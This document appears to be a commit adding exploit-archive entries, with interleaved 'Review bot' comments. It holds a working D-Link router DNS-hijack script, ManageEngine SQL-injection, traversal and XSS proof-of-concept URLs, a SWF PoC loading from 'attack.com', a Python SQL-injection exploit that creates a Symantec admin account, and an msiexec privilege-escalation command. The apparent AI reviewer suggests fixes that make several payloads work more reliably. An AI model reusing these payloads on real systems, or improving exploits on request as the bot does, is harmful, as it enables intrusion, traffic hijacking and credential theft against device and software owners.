printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
exit(0);
}
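Review bot: the length guard `if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service)))` checks each input separately against the 128-byte `service` buffer, but the buffer has to hold `temp_pass` + `serial_no` + the 8-byte `SECRET_PASS` + a terminator; with inputs near the limit `strcat_s` hits a constraint violation and aborts (it does not overflow, but it does not produce a password either). The check should be on the combined length, e.g. `strlen(temp_pass) + strlen(serial_no) + strlen(secret_pass) < sizeof(service)`. Two smaller points: `printf_s("Wrong Argument: %s\n", argv[1])` prints the first argument rather than the offending option (use `optopt`), and `printf_s`/`strcpy_s`/`strcat_s` plus the local `"md5.h"` and `"getopt.h"` headers tie the build to MSVC with bundled sources, which the file header does not mention; the `woofwoof.exe` transcript suggests Windows was the only tested build.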


@ -0,0 +1,65 @@
#!/bin/bash
#
# D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit
#
# Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
#
# Description:
# Different D-Link Routers are vulnerable to DNS change.
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
# DEVICES MAY AFFECTED.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit"
echo " ================================================================"
echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
echo " Example: $0 192.168.1.1 8.8.8.8"
echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
echo " http://www.ethical-hacker.org/"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" 0&> /dev/null <&1
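Review bot: the trailing `0&> /dev/null <&1` on the final `GET` line looks like a typo for `> /dev/null 2>&1`; as written the bare `0` is passed to GET as an extra argument and `<&1` redirects stdin from stdout, which serves no purpose. The usage text also advertises the alternate DNS as optional, but with two arguments `$3` is empty and `dnsSecondary=` is sent with an empty value rather than being omitted, so the secondary server on the device may be blanked; either require both arguments or build the query string conditionally. The `GET` lookup is fine, but `[ $? -ne 0 ]` after a command substitution tests the exit status of the assignment, which in bash is the substitution's status, so that works only by that rule; `command -v GET >/dev/null || { ...; exit 1; }` is clearer and also exits non-zero on error instead of the bare `exit`.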

platforms/jsp/webapps/35890.txt Executable file

@ -0,0 +1,89 @@
================================================================================
[REWTERZ-20140101] - Rewterz - Security Advisory
================================================================================
Title: ManageEngine ServiceDesk SQL Injection Vulnerability
Product: ServiceDesk Plus (http://www.manageengine.com/)
Affected Version: 9.0 (Other versions could also be affected)
Fixed Version: 9.0 Build 9031
Vulnerability Impact: High
Advisory ID: REWTERZ-20140101
Published Date: 22-Jan-2015
Researcher: Muhammad Ahmed Siddiqui
Email: ahmed [at] rewterz.com
URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-sql-injection-vulnerability
================================================================================
Product Introduction
================
ServiceDesk Plus is a help desk software with integrated asset and
project management built on the ITIL framework. It is available in 29
different languages and is used by more than 85,000 companies, across
186 countries, to manage their IT help desk and assets.
Source: http://www.manageengine.com/products/service-desk/
Vulnerability Information
==================
Class: SQL Injection Vulnerability
Impact: An Authenticated user could exploit this vulnerability to gain
complete system access.
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A
Vulnerability Description
==================
CreateReportTable.jsp page is prone to SQL injection via site
variable. A user with limited privileges could exploit this
vulnerability to gain complete database/system access.
Proof-of-Concept
=============
Postgres DB:
http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0 AND
3133=(SELECT 3133 FROM PG_SLEEP(1))
MySQL DB:
http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0 AND UNION
ALL SELECT user(),NULL,NULL,NULL,NULL
Timeline
======
23-Dec-2014 Notification to Vendor
24-Dec-2014 Response from Vendor
30-Dec-2014 Vulnerability fixed by Vendor
About Rewterz
===========
Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services. Our
strategy revolves around the need to provide round-the-clock quality
information security services and solutions to our customers. We
maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.
http://www.rewterz.com
Complete list of vulnerability advisories published by Rewterz:
http://www.rewterz.com/resources/security-advisories
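Review bot: the MySQL proof of concept (`site=0 AND UNION ALL SELECT user(),NULL,NULL,NULL,NULL`) is not valid SQL as written, since `AND` cannot be followed directly by `UNION`; it documents neither a boolean condition nor a clean union select, so the Postgres `PG_SLEEP(1)` line is the only reproducible test in the file and the MySQL line should be corrected or dropped. Both PoC URLs are also wrapped across two lines, which will trip anyone copying them into a detection signature. Minor: the title reads 'ManageEngine ServiceDesk' while the Product line and the two sibling advisories say 'ServiceDesk Plus'; `Fixed Version: 9.0 Build 9031` is the actionable value for defenders.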

platforms/jsp/webapps/35891.txt Executable file

@ -0,0 +1,101 @@
================================================================================
[REWTERZ-20140102] - Rewterz - Security Advisory
================================================================================
Title: ManageEngine ServiceDesk Plus User Enumeration Vulnerability
Product: ServiceDesk Plus (http://www.manageengine.com/)
Affected Version: 9.0 (Other versions could also be affected)
Fixed Version: 9.0 Build 9031
Vulnerability Impact: Low
Advisory ID: REWTERZ-20140102
Published Date: 22-Jan-2015
Researcher: Muhammad Ahmed Siddiqui
Email: ahmed [at] rewterz.com
URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-plus-user-enumeration-vulnerability
================================================================================
Product Introduction
===============
ServiceDesk Plus is a help desk software with integrated asset and
project management built on the ITIL framework. It is available in 29
different languages and is used by more than 85,000 companies, across
186 countries, to manage their IT help desk and assets.
Source: http://www.manageengine.com/products/service-desk/
Vulnerability Information
==================
Class: User Name Enumeration
Impact: An unauthenticated and authenticated user can enumerate users
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A
Vulnerability Description
===================
An unauthenticated and authenticated user can enumerate all the users
and domains on the system by sending a simple request to URL.
Proof-of-Concept Authenticated User
============================
An attacker can use the following URL to enumerate users and domains
by accessing the following URL:
http:// 127.0.0.1:8080/servlet/AJaxServlet?action=checkUser&search=guest
Response if User is valid:
{ USER_PRESENT: 'true', IN_SITE: 'true' }
Response if User is invalid:
{ USER_PRESENT: 'false', ADD_REQUESTER: 'false' }
Proof-of-Concept Unauthenticated User
==============================
An attacker can use the following URL to enumerate users and domains
by accessing the following URL:
http://127.0.0.1:8080/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=100101
If the user in the Search Parameter is found the response will contain
the domain name in which that particular user exists.
Timeline
=======
23-Dec-2014 Notification to Vendor
24-Dec-2014 Response from Vendor
30-Dec-2014 Vulnerability fixed by Vendor
About Rewterz
============
Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services. Our
strategy revolves around the need to provide round-the-clock quality
information security services and solutions to our customers. We
maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.
http://www.rewterz.com
Complete list of vulnerability advisories published by Rewterz:
http://www.rewterz.com/resources/security-advisories
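Review bot: `Authentication Required: Yes` in the Vulnerability Information block contradicts the description ('An unauthenticated and authenticated user can enumerate...') and the dedicated 'Proof-of-Concept Unauthenticated User' section for `/domainServlet/AJaxDomainServlet`; the field should read 'No' (or 'No, for the domain servlet'). The first PoC URL has a stray space (`http:// 127.0.0.1:8080/...`) that breaks copy-paste. The authenticated check returns a clean `USER_PRESENT: 'true'` / `'false'` discriminator, which is the textbook username-enumeration oracle; the generic fix is a response that does not vary with account existence, plus rate limiting and logging on `action=checkUser`.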

platforms/jsp/webapps/35904.txt Executable file

@ -0,0 +1,87 @@
================================================================================
[REWTERZ-20140103] - Rewterz - Security Advisory
================================================================================
Title: ManageEngine ServiceDesk Plus User Privileges Management Vulnerability
Product: ServiceDesk Plus (http://www.manageengine.com/)
Affected Version: 9.0 (Other versions could also be affected)
Fixed Version: 9.0 Build 9031
Vulnerability Impact: Low
Advisory ID: REWTERZ-20140103
Published Date: 22-Jan-2015
Researcher: Muhammad Ahmed Siddiqui
Email: ahmed [at] rewterz.com
URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-plus-user-privileges-management-vulnerability
================================================================================
Product Introduction
===============
ServiceDesk Plus is a help desk software with integrated asset and
project management built on the ITIL framework. It is available in 29
different languages and is used by more than 85,000 companies, across
186 countries, to manage their IT help desk and assets.
Source: http://www.manageengine.com/products/service-desk/
Vulnerability Information
===================
Class: Improper Privilege Management
Impact: Low privileged user can access application data
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A
Vulnerability Description
==================
A user with limited privileges could gain access to certain
functionality that is available only to administrative users. For
example, users with Guest privileges can see the subjects of the
tickets, stats and other information related to tickets.
Proof-of-Concept
=============
http://127.0.0.1:8080/servlet/AJaxServlet?action=getTicketData&search=dateCrit
http://127.0.0.1:8080/swf/flashreport.swf
http://127.0.0.1:8080/reports/flash/details.jsp?group=Site
http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0
Timeline
======
23-Dec-2014 Notification to Vendor
24-Dec-2014 Response from Vendor
30-Dec-2014 Vulnerability fixed by Vendor
About Rewterz
===========
Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services. Our
strategy revolves around the need to provide round-the-clock quality
information security services and solutions to our customers. We
maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.
http://www.rewterz.com
Complete list of vulnerability advisories published by Rewterz:
http://www.rewterz.com/resources/security-advisories
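Review bot: the proof of concept is four bare URLs with no indication of what a Guest-role session receives from each (status code, a sample of the returned data), so neither the issue nor the fix in Build 9031 can be verified from the file; one example response per URL is needed. `reports/CreateReportTable.jsp?site=0` is the same endpoint as the SQL injection in the sibling advisory REWTERZ-20140101, and the two should cross-reference each other, since the authorization gap described here is what lets a low-privilege account reach the injectable `site` parameter at all. `Vulnerability Impact: Low` also sits uneasily next to a description that says the user gains administrative-only functionality; the reasoning behind the rating is not given.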

platforms/jsp/webapps/35910.txt Executable file

@ -0,0 +1,57 @@
################################################################################################
# #
# ...:::::ManageEngine EventLog Analyzer Directory Traversal/XSS Vulnerabilities::::.... #
# #############################################################################################
Sobhan System Network & Security Group (sobhansys)
-------------------------------------------------------
# Date: 2015-01-24
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/eventlog/
# Demo Link: http://demo.eventloganalyzer.com/event/index3.do
#Affected version: <= Build Version : 9.0
About ManageEngine EventLog Analyzer (From Vendor Site) :
EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market.
Using this Log Analyzer software, organizations can automate
the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting,
and archiving from one central location.
This event log analyzer software helps to monitor file integrity, conduct log forensics analysis,
monitor privileged users and comply to different compliance regulatory bodies
by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.
--------------------------------------------------------
I'M hadihadi From Virangar Security Team
special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz
greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei
spl:Z.Khodaee
-------
exploit:
Diretory Traversal :
http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?completeData=true&helpP=archiveAction&tab=system&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13&tab=system&url=../../WEB-INF/web.xml%3f
XSS :
http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=userReport'%22()%26%25<ahy><ScRiPt%20>prompt(915375)</ScRiPt>
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25<ahy><ScRiPt%20>prompt(978138)</ScRiPt>&tab=system&url=ConfigureTemplate
----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)
E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net
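Review bot: the three directory-traversal URLs all target `url=../../WEB-INF/web.xml%3f`, but the file gives no expected response and no fixed build; `Affected version: <= Build Version : 9.0` is the only version information and there is no vendor-notification timeline, so a reader cannot tell whether the current release is patched. The XSS payloads mix raw `<`, `>` and `'` with percent-encoded characters, which will not survive every client unchanged; a fully percent-encoded form (or the decoded string) would make them reproducible for verification. The author block is also inconsistent: the header names AmirHadi Yazdani (Sobhansys) while the body says 'I'M hadihadi From Virangar Security Team'.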


@ -0,0 +1,58 @@
# Exploit Title: SWFupload All Version XSF Vulnerability
# Date: 25/01/2014
# Exploit Author: MindCracker - Team MaDLeeTs
# Contact : MindCrackerKhan@Gmail.com - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan
# Verion : All
# Tested on: Linux / Window
#Description :
XSF occurs when an SWF have permission/able to load another file from another directory or site.The vulnerable
swf can be exploited by just loading swf/img/any ( like Phishing or Cross-Site scripting
#Vulnerable Code :
ExternalInterface.addCallback("SetButtonTextStyle",this.SetButtonTextStyle);
this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle));
}
catch(ex:Object)
{
this.SetButtonTextStyle("");
}
try
{
As you can see the .buttonTextStyle variable is not well configured ( by exactly adding the value ) and This ButtonTextStyle will accept any value
The vulneralbe SWF will load any file
http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf
2.
ExternalInterface.addCallback("SetButtonText",this.SetButtonText);
SetButtonText
{
this.SetButtonText(String(root.loaderInfo.parameters.buttonText));
}
catch(ex:Object)
{
this.SetButtonText("");
}
try
{
#POC
http://victim.com/swfupload.swf?buttonTextStyle=http://attack.com/Exploiting.swf
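Review bot: the two 'Vulnerable Code' excerpts are out of order: each opens with the `addCallback` line, then a closing `}`, then `catch(ex:Object)`, and ends with a dangling `try {`, so as pasted they are not syntactically valid ActionScript; restoring the original `try { ... } catch { ... }` order would make the flaw (the `buttonTextStyle` / `buttonText` loader parameters consumed without validation) readable. The PoC URLs name different files (`buttontextstyle.swf` and `swfupload.swf`), the term XSF is never expanded (cross-site flashing), and `Date: 25/01/2014` is a year off from the rest of this commit. No fixed version or vendor contact is recorded, which matters because the title claims 'All Version'.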


@ -0,0 +1,30 @@
# Exploit Title: jclassifiedsmanager Multiple Vulnerabilities
# Google Dork: inurl:com_jclassifiedsmanager
# Date: 26 Jan 2015
# Exploit Author: Sarath Nair aka AceNeon13
# Contact: @AceNeon13
# Greetings: HariKrishnan, Raj3sh.tv, Deepu.tv
# Vendor Homepage: cmsjunkie.com
# Software Link: http://www.cmsjunkie.com/classifieds-manager
# PoC Exploit: SQL Injection
--------------------------------
http://localhost/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=[SQL Injection Here]
"id" parameter is not sanitized.
# PoC Exploit: XSS Reflected
--------------------------------
http://localhost/jclassifiedsmanager/classifieds?view=displayads7ed3b"onload%3d"alert(1)"87d4d&layout=offerring&controller=displayads&adtype=1
"view" parameter is not sanitized.
########################################
# Vulnerability Disclosure Timeline:
2014-Dec-11: Discovered vulnerability
2014-Dec-12: Vendor Notification
2014-Dec-12: Vendor Response/Feedback
2015-Jan-19: Vendor Fix/Patch
2015-Jan-26: Public Disclosure
#######################################
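Review bot: neither PoC records the affected version, and the timeline ends with `2015-Jan-19: Vendor Fix/Patch` without saying which release carries the fix, so the `Google Dork` line surfaces patched and unpatched installs alike; the fixed version should be added. The SQL injection entry says only that `id` is not sanitized, with neither the vulnerable query nor a distinguishing response, and the reflected XSS in `view` is an attribute break-out (`"onload%3d"alert(1)"`), which implies the parameter is reflected inside an HTML attribute; stating that context is what a defender needs to confirm that the vendor's encoding fix covers it.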


@ -0,0 +1,311 @@
SEC Consult Vulnerability Lab Security Advisory < 20150122-0 >
=======================================================================
title: Multiple critical vulnerabilities
products: Symantec Data Center Security: Server Advanced (SDCS:SA)
Symantec Critical System Protection (SCSP)
vulnerable version: see: Vulnerable / tested versions
fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all
vulnerabilities were fixed, but mitigations exist
impact: Critical
CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226
homepage: http://www.symantec.com
found: 2014-09-19
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced)
extends the Data Center Security: Server solution beyond agentless threat
protections by incorporating technologies previous known as Critical System
Protection. Data Center Security: Server Advanced provides granular, policy-
based controls with a low impact in-guest agent to monitor and protect numerous
physical and virtual server environments. Through a combination of technologies
including application-centric controls including protected white listing,
sandboxing using least privilege access controls, host-based intrusion detection
(HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM),
organizations can proactively safeguard their heterogeneous server environments
and the information they contain from zero-day and targeted attacks, and fulfill
their compliance mandates across critical systems. Click here for more info"
Source:
http://www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products
Business recommendation:
------------------------
Attackers are able to completely compromise the SDCS:SA Server as they can gain
access at the system and database level. Furthermore attackers can manage all
clients and their policies.
SDCS:SA Server can be used as an entry point into the target infrastructure
(lateral movement, privilege escalation).
Furthermore the SDCS:SA Client protections can be bypassed in several ways.
It is highly recommended by SEC Consult not to use this software until a
thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been
performed by security professionals and all identified issues have been
resolved.
Note: SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used.
Vulnerability overview/description:
-----------------------------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
Due to insufficient input validation, the application allows the injection
of direct SQL commands. By exploiting the vulnerability, an attacker gains
access (read/write) to all records stored in the database as arbitrary SQL
statements can be executed.
Furthermore the application design enables an attacker to gain code execution
as SYSTEM (highest privilege Windows user) on the server by exploiting this
vulnerability.
No prior authentication is needed to exploit this vulnerability.
Affected script:
https://<host>:4443/sis-ui/authenticate
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
The applications suffers from a reflected cross-site scripting vulnerability,
which allows an attacker to steal other users' sessions, to impersonate other
users and to gain unauthorized access to the admin interface.
Affected scripts:
https://<host>:8081/webui/Khaki_docs/SSO-Error.jsp
https://<host>:8081/webui/admin/WCUnsupportedClass.jsp
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
A script discloses internal information about the application on the server
without prior authentication. This information includes file paths on the
webserver, version information (OS, Java) and is accessible without prior
authentication.
Affected script:
https://<host>:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
Several bypasses were discovered. These require Windows Administrator
permissions. This requirement is usually met in SDCS:SA deployments.
Note: SEC Consult did not check whether the mitigations provided by Symantec do
in fact sufficiently mitigate these vulnerabilities!
- Persistent code execution via Windows Services
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution.
- Remote code execution via RPC
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution. In addition to that "psexec-style" remote code
execution via SMB is possible as well.
- Policy bypass: Extraction of Windows passwords/hashes
The default Symantec policy rules do not prevent attackers from extracting
the Windows passwords/password hashes from the System.
- Privilege elevation via Windows Installer (msiexec.exe)
The restrictions imposed by the default policies can be bypassed entirely by
exploiting incorrect assumptions made in the policy regarding the Windows
Installer (msiexec.exe).
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
The restrictions imposed by default policies can be bypassed partially by
exploiting incorrect assumptions made in the policy regarding the Windows
Management Instrumentation. The policy does not take intended OS functionality
to execute code into account.
Proof of concept:
-----------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is
vulnerable to SQL injection. By sending a specially crafted HTTP request,
arbitrary SQL statements can be executed.
In a proof of concept exploit, SQL statements to add a new SDCS:SA user with
admin privileges (username: secconsult, password: PASSWORD123!) were executed.
These statements are:
INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL,
ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME,
MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult',
'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=',
'', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09',
'2014-09-12 07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);
The code used to exploit the SQL injection vulnerability is listed below:
import httplib
def send_request(host,data):
params = data
headers = {"AppFire-Format-Version": "1.0",
"AppFire-Charset": "UTF-16LE",
"Content-Type":"application/x-appfire",
"User-Agent":"Java/1.7.0_45",
}
conn = httplib.HTTPSConnection(host)
conn.request("POST", "/sis-ui/authenticate", params, headers)
response = conn.getresponse()
data=response.read()
conn.close()
return response,data
header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
'', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
-- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
ROLERID) VALUES (1504, 1); -- " # add user to admin group
data+="\r\nan=Symantec Data Center Security Server
6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')
eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag
response,data = send_request("<host>:4443",payload)
print data.decode('utf-16le')
print response.status
As the application users act as Tomcat administrators, an attacker can login
into the Tomcat manager as well. The Tomcat manager is available by default
via TCP port 8081 HTTPS.
The Tomcat Web Application Manager can be used to deploy new .war-files
containing attacker-controlled Java code. This allows an attacker to execute
arbitrary commands on the operating system with the permissions/user of the
"Symantec Data Center Security Server Manager" service (SISManager) which are
SYSTEM.
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
At least the following URLs are vulnerable to XSS:
https://example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>
https://example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script>
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
The following URLs discloses internal information:
https://example.com:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
- Persistent code execution via Windows Services
Windows Service binaries can have file extensions other than ".exe". This
allows an attacker to execute arbitrary files and enables automatic execution
of malicious code at OS boot.
- Remote code execution via RPC
Existing tools like "psexec" or Metasploit (/exploit/windows/smb/psexec) can
be modified to write files not ending with ".exe" on the target system.
- Policy bypass: Extraction of Windows passwords/hashes
The tool "mimikatz" can be used to extract Windows credentials.
- Privilege elevation via Windows Installer (msiexec.exe)
msiexec.exe is trusted "safe privileges" when started as a service (usually
"Windows Installer" parameter "/V"). This can be abused by creating a service
that starts msiexec.exe with the parameters "/quiet", "/i" and a path to a valid
.msi file. Upon service start the .msi file is executed with "safe privileges"
privileges and not subject to any SDCS:SA Client checks.
sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i
c:\temp\evil_msi" type= own start= auto error= ignore
net start evil_service
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
On old Windows versions .mof files placed in "%SystemRoot%\System32\wbem\mof\"
are automatically compiled/executed. These trigger arbitrary code execution.
The code is executed with "def_winsvcs_ps" permissions.
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Symantec Data Center
Security: Server Advanced version 6.0, which was the most recent version at
the time of discovery.
However other versions (SCSP 5.2.9) are affected by the vulnerabilities as
well. See the vendor information in the Solution section.
Vendor contact timeline:
------------------------
2014-10-20: Sending advisory and proof of concept exploit via encrypted
channel.
2014-10-20: Vendor acknowledges receipt of advisory.
2014-11-18: Requesting status update.
2014-11-18: Vendor responds and informs about an advisory in December,
version containing fixes in February.
2014-12-04: Vendor informs about delays in releasing fixes/mitigations,
target release date mid-January.
2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17).
2015-01-17: Vendor releases fixes for SCSP.
2015-01-19: Vendor releases advisory and mitigations for SCSP/
2015-01-22: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1).
Not all vulnerabilities are fixed by this update! However, Symantec has
provided mitigations for these issues:
More information can be found at:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00
http://www.symantec.com/business/support/index?page=content&id=TECH227679
http://www.symantec.com/business/support/index?page=content&id=HOWTO100996&actp=search&viewlocale=en_US&searchid=1421349750071
Workaround:
-----------
See solution.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF Stefan Viehböck / @2015
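Review bot: the note in the Business recommendation section, 'SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used', has the replacement backwards: the vendor description says SDCS:SA incorporates 'technologies previous known as Critical System Protection', and the Solution section lists SCSP 5.2.9 MP6 and SDCS:SA 6.0 MP1 as the two current lines, so it is SCSP that SDCS:SA superseded. The proof-of-concept Python has been re-wrapped for the advisory: the `data =` and `data+=` string literals span several lines without continuation, so the script does not parse as printed and the claim that this is 'the code used' cannot be checked from the file. Smaller points: 'The following URLs discloses' should be 'URLs disclose'; the timeline entry '2015-01-19: Vendor releases advisory and mitigations for SCSP/' is cut off; and the Metasploit module path is `exploit/windows/smb/psexec` without the leading slash.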

platforms/php/webapps/35857.txt Executable file

@ -0,0 +1,50 @@
# Exploit Title: SQL injection vulnerability in articleFR CMS 3.0.5
# Google Dork: N/A
# Date: 01/21/2015
# Exploit Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team (www.itas.vn)
# Vendor Homepage: http://freereprintables.com
# Software Link: https://github.com/articlefr/articleFR
# Version: version 3.0.5
# Tested on: Linux
# CVE : N/A
::PROOF OF CONCEPT::
- REQUEST:
POST /articlefr/register/ HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.org/articlefr/register/
Cookie: _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-31; GEAR=local-5422433b500446ead50002d4; PHPSESSID=8a9r8t1d5g9veogj6er9fvev63; _gat=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
username=[SQL INJECTION HERE]&email=test2%40itas.vn&name=test&password=123123&submit=register
- Vulnerable file: articleFR/system/profile.functions.php
